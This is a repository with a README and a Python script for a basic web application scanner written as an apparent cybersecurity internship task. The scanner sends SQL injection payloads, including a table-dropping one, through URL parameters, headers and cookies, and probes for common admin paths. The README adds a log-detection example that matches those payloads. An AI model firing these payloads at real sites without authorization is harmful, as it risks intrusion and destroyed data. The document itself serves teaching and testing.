├── README.md
├── WEBAPP-SCANNER.py
└── requirements.txt
/README.md:
--------------------------------------------------------------------------------
# SQLInjection-scanner
***COMPANY***: CDETECH IT SOLUTION

***NAME***: Sobiya vhora

***INTERN ID***: CT08GRD

***DOMAIN***: Cyber Security & Ethical Hacking

***BATCH DURATION***: December 25th, 2024 to January 25th, 2025

***MENTOR NAME***: Neela Santhosh

***DESCRIPTION OF TASK-2***
## Objective
This Python-based **Web Application Vulnerability Scanner** looks for common security weaknesses in web applications. It automates testing for **SQL Injection** and **Cross-Site Scripting (XSS)** and checks for the presence of common **admin panels**, so that cybersecurity professionals and penetration testers can quickly assess the security posture of a web application.
18 |
## Key Features
- **SQL Injection Detection**:
  - Tests query parameters, headers, and cookies for SQL injection vulnerabilities.
  - Example payloads:
    - `' OR '1'='1`
    - `'; DROP TABLE users; --`
    - `' UNION SELECT null, version(); --`

- **Cross-Site Scripting (XSS) Detection**:
  - Scans query parameters, headers, cookies, and dynamic content for XSS vulnerabilities.
  - Example payloads:
    - ``
    - ``

- **Admin Panel Detection**:
  - Searches for common admin panel endpoints such as:
    - `/admin`
    - `/administrator`
    - `/admin/login`
    - `/admin/dashboard`

- **File Metadata Injection**:
  - Tests for XSS vulnerabilities through uploaded file metadata.

- **Dynamic Content Injection**:
  - Checks whether the application reflects a payload supplied through the `content` query-string parameter.
45 |
## Example Usage
```bash
$ python WEBAPP-SCANNER.py
Enter the target URL: https://example.com

[START] Scanning URL: https://example.com
[INFO] Testing query parameters for SQL Injection...
[VULNERABLE] SQL Injection in parameter 'id' with payload: ' OR '1'='1
[INFO] Testing headers for XSS...
[VULNERABLE] XSS in header 'Referer' with payload:
[INFO] Testing admin panel endpoints...
[INFO] Admin panel not found at https://example.com/admin.
[SUMMARY] Scan completed.
[END] Thank you for using the scanner!
```
61 |
## Requirements
- Python 3.x
- Required libraries:
  - `requests`
  - `beautifulsoup4` (imported as `bs4`)
  - `colorama`

Install the required libraries using:
```bash
pip install -r requirements.txt
```
73 |
## How to Run
1. Clone the repository:
   ```bash
   git clone https://github.com/SobiyMariyam/webapp-vulnerability-scanner.git
   cd webapp-vulnerability-scanner
   ```
2. Run the script:
   ```bash
   python WEBAPP-SCANNER.py
   ```
84 |
## How It Works
1. The user provides a target URL as input.
2. The scanner sequentially tests:
   - Query parameters
   - HTTP headers
   - Cookies
   - Dynamic content injection through the `content` query-string parameter
   - Common admin panel endpoints
   - File upload metadata
3. After testing, the tool summarizes the vulnerabilities found. Detection is heuristic: a response is flagged when its body contains the strings `SQL` or `error`, or when the injected payload is reflected verbatim, so each finding should be confirmed by hand before it is reported.
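
Seen from the target's side, the steps above leave a recognizable trace in the web server's access log. The following is an added example, not part of the scanner, that flags the scanner's own query-string and User-Agent payloads and its admin-endpoint enumeration in constructed lines of Apache/nginx combined log format; the finding names are this example's own.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Markers taken from the scanner's own payload lists (lower-cased for matching)
SQLI_MARKERS = ["' or '1'='1", "drop table", "union select"]
# Endpoints the scanner enumerates; a 404 on these is still evidence of a probe
ADMIN_PATHS = {"/admin", "/administrator", "/admin/login", "/admin/dashboard"}
# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def sqli_marker_in(value):
    """Return the first marker found in a (possibly still URL-encoded) value, else None."""
    return next((m for m in SQLI_MARKERS if m in unquote(value).lower()), None)

def classify(line):
    """Return (client_ip, [finding, ...]) for one access-log line; (None, []) if unparsed."""
    m = LOG_RE.match(line)
    if not m:
        return None, []
    findings = []
    target = urlparse(m.group("target"))
    # Query-string probes: parse_qs decodes %27 and '+' the way the server does
    for param, values in parse_qs(target.query, keep_blank_values=True).items():
        if any(sqli_marker_in(v) for v in values):
            findings.append(f"sqli_probe_query:{param}")
    # Header probes: the combined format records User-Agent, which the scanner fuzzes
    if sqli_marker_in(m.group("ua")):
        findings.append("sqli_probe_user_agent")
    if target.path in ADMIN_PATHS:
        findings.append(f"admin_path_probe:{target.path}")
    return m.group("ip"), findings

def scan_log(lines):
    """Group findings per client: several categories from one client in a short
    window is the signature of an automated scan rather than a stray request."""
    per_ip = {}
    for line in lines:
        ip, findings = classify(line)
        for f in findings:
            per_ip.setdefault(ip, set()).add(f)
    return per_ip

# Constructed sample lines (not from a real server) in combined log format
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2025:10:00:01 +0000] "GET /item?id=%27+OR+%271%27%3D%271 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"',
    "203.0.113.7 - - [10/Jan/2025:10:00:02 +0000] \"GET /item?id=5 HTTP/1.1\" 200 512 \"-\" \"' OR '1'='1\"",
    '203.0.113.7 - - [10/Jan/2025:10:00:03 +0000] "GET /admin/login HTTP/1.1" 404 153 "-" "python-requests/2.32.3"',
    '198.51.100.9 - - [10/Jan/2025:10:00:04 +0000] "GET /item?id=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

`scan_log(SAMPLE_LOG)` attributes all three probe categories to `203.0.113.7` and nothing to the ordinary client, which is the grouping a detection rule would alert on.
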
94 |
## Disclaimer
This tool is intended for educational purposes and authorized penetration testing only. Ensure you have proper permission before scanning any web application.
97 |
--------------------------------------------------------------------------------
/WEBAPP-SCANNER.py:
--------------------------------------------------------------------------------
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlencode, urlparse, parse_qs
import colorama
from colorama import Fore, Style

colorama.init()

# Seconds to wait for any single request, so an unresponsive target cannot hang the scan
REQUEST_TIMEOUT = 10

# Payloads for SQL Injection and XSS
SQLI_PAYLOADS = ["' OR '1'='1", "'; DROP TABLE users; --", "' UNION SELECT null, version(); --"]
# Placeholder entries: the XSS probe strings are not present in this copy of the script.
# Empty payloads are skipped by the reflection check, because "" is a substring of every response.
XSS_PAYLOADS = ["", ""]

# Custom headers for testing
TEST_HEADERS = {
    "User-Agent": "' OR '1'='1",
    "Referer": "",  # placeholder, see XSS_PAYLOADS
    "X-Custom-Header": "' UNION SELECT null, version(); --"
}

# Test cookies for vulnerabilities
TEST_COOKIES = {
    "session_id": "' OR '1'='1",
    "tracking_id": ""  # placeholder, see XSS_PAYLOADS
}


def looks_like_sql_error(body):
    """Detection heuristic for SQL Injection: an error string in the response body.
    This is deliberately loose and produces false positives; confirm findings by hand."""
    return "SQL" in body or "error" in body


def is_reflected(payload, body):
    """Detection heuristic for XSS: the payload comes back verbatim in the response."""
    return bool(payload) and payload in body


def find_forms(url):
    """Fetch and return all forms from a given URL (not called by main yet)."""
    try:
        response = requests.get(url, timeout=REQUEST_TIMEOUT)
        soup = BeautifulSoup(response.content, 'html.parser')
        return soup.find_all('form')
    except Exception as e:
        print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Could not fetch forms from {url}: {e}")
        return []


def test_query_parameters(url, payloads, vuln_type):
    """Test query parameters in the URL for vulnerabilities."""
    print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing query parameters for {vuln_type}...")
    parsed_url = urlparse(url)
    query_params = parse_qs(parsed_url.query)
    if not query_params:
        print(f"{Fore.YELLOW}[INFO]{Style.RESET_ALL} No query parameters to test.")
        return False
    vulnerable = False
    for param in query_params:
        for payload in payloads:
            # Replace one parameter at a time and keep the others at their original values
            test_params = query_params.copy()
            test_params[param] = [payload]
            test_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}?{urlencode(test_params, doseq=True)}"
            try:
                response = requests.get(test_url, timeout=REQUEST_TIMEOUT)
                if vuln_type == "SQL Injection" and looks_like_sql_error(response.text):
                    print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} SQL Injection in parameter '{param}' with payload: {payload}")
                    vulnerable = True
                elif vuln_type == "XSS" and is_reflected(payload, response.text):
                    print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} XSS in parameter '{param}' with payload: {payload}")
                    vulnerable = True
            except Exception as e:
                print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing parameter '{param}': {e}")
    return vulnerable


def test_headers(url, vuln_type):
    """Test HTTP headers for vulnerabilities."""
    print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing headers for {vuln_type}...")
    vulnerable = False
    for header, payload in TEST_HEADERS.items():
        headers = {header: payload}
        try:
            response = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT)
            if vuln_type == "SQL Injection" and looks_like_sql_error(response.text):
                print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} SQL Injection in header '{header}' with payload: {payload}")
                vulnerable = True
            elif vuln_type == "XSS" and is_reflected(payload, response.text):
                print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} XSS in header '{header}' with payload: {payload}")
                vulnerable = True
        except Exception as e:
            print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing header '{header}': {e}")
    return vulnerable


def test_cookies(url, vuln_type):
    """Test cookies for vulnerabilities."""
    print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing cookies for {vuln_type}...")
    vulnerable = False
    for cookie, payload in TEST_COOKIES.items():
        cookies = {cookie: payload}
        try:
            response = requests.get(url, cookies=cookies, timeout=REQUEST_TIMEOUT)
            if vuln_type == "SQL Injection" and looks_like_sql_error(response.text):
                print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} SQL Injection in cookie '{cookie}' with payload: {payload}")
                vulnerable = True
            elif vuln_type == "XSS" and is_reflected(payload, response.text):
                print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} XSS in cookie '{cookie}' with payload: {payload}")
                vulnerable = True
        except Exception as e:
            print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing cookie '{cookie}': {e}")
    return vulnerable


def test_dynamic_content(url, payloads):
    """Test for dynamic content injection through the 'content' query-string parameter."""
    print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing dynamic content injection...")
    vulnerable = False
    for payload in payloads:
        # urlencode keeps quotes, spaces and angle brackets in the payload from breaking the URL
        test_url = f"{url}?{urlencode({'content': payload})}"
        try:
            response = requests.get(test_url, timeout=REQUEST_TIMEOUT)
            if is_reflected(payload, response.text):
                print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} Dynamic content injection with payload: {payload}")
                vulnerable = True
        except Exception as e:
            print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing dynamic content injection: {e}")
    return vulnerable


def test_admin_panels(url):
    """Test common admin panel endpoints."""
    print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing admin panel endpoints...")
    admin_paths = ["/admin", "/administrator", "/admin/login", "/admin/dashboard"]
    for path in admin_paths:
        test_url = urljoin(url, path)
        try:
            response = requests.get(test_url, timeout=REQUEST_TIMEOUT)
            # A 200 is taken as "present"; a site that answers 200 for every path will look positive
            if response.status_code == 200:
                print(f"{Fore.GREEN}[INFO]{Style.RESET_ALL} Admin panel found at {test_url}.")
            else:
                print(f"{Fore.YELLOW}[INFO]{Style.RESET_ALL} Admin panel not found at {test_url}.")
        except Exception as e:
            print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing admin panel: {e}")


def test_file_metadata(url, file_payload):
    """Test metadata in uploaded files for vulnerabilities."""
    print(f"{Fore.BLUE}[INFO]{Style.RESET_ALL} Testing file metadata...")
    files = {'file': ('.txt', file_payload)}
    try:
        response = requests.post(url, files=files, timeout=REQUEST_TIMEOUT)
        # Crude marker check: only fires if the response body echoes the string "XSS"
        if "XSS" in response.text:
            print(f"{Fore.GREEN}[VULNERABLE]{Style.RESET_ALL} File metadata vulnerability detected.")
    except Exception as e:
        print(f"{Fore.RED}[ERROR]{Style.RESET_ALL} Error testing file metadata: {e}")


def main(url):
    """Main function to run the scanner for all vulnerabilities."""
    print(f"{Fore.BLUE}[START]{Style.RESET_ALL} Scanning URL: {url}")

    # Query Parameters
    test_query_parameters(url, SQLI_PAYLOADS, "SQL Injection")
    test_query_parameters(url, XSS_PAYLOADS, "XSS")

    # Headers
    test_headers(url, "SQL Injection")
    test_headers(url, "XSS")

    # Cookies
    test_cookies(url, "SQL Injection")
    test_cookies(url, "XSS")

    # Dynamic Content Injection
    test_dynamic_content(url, XSS_PAYLOADS)

    # Admin Panel Endpoints
    test_admin_panels(url)

    # File Metadata
    test_file_metadata(url, "Sample payload for file upload vulnerability testing.")

    print(f"{Fore.MAGENTA}[SUMMARY]{Style.RESET_ALL} Scan completed.")
    print(f"{Fore.BLUE}[END]{Style.RESET_ALL} Thank you for using the scanner!")


if __name__ == "__main__":
    target_url = input("Enter the target URL: ").strip()
    main(target_url)
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
requests
beautifulsoup4
colorama
--------------------------------------------------------------------------------